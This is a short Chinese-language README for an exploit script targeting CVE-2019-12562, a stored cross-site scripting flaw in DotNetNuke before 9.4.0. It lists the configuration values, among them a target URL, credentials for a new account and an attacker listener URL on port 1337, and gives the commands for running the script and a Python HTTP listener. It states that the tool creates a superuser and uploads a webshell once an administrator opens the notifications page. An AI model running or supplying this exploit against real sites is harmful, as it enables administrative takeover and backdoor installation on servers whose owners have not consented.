CVE-2019-12562 DotNetNuke (DNN) 9.4.0 之前版本中存在存储型跨站脚本漏洞,允许远程攻击者将恶意脚本存储并嵌入到管理员通知页面。该漏洞可用于执行任何管理员权限的操作,例如管理内容、添加用户、上传后门到服务器等。当管理员用户访问包含存储型跨站脚本的通知页面时,漏洞利用成功。
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # 至少五个字符
PASSWORD = "P@ssw0rd" # 至少0个非字母数字字符,至少7个字符
EMAIL = "[email protected]" # 可修改为任意邮箱
# 用于监听事件的web服务器
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
该漏洞利用程序将在目标服务器上创建一个超级用户并上传webshell
利用条件:当管理员用户访问通知页面时,漏洞利用成功。
了解更多:https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE参考:https://www.cvedetails.com/cve/CVE-2019-12562/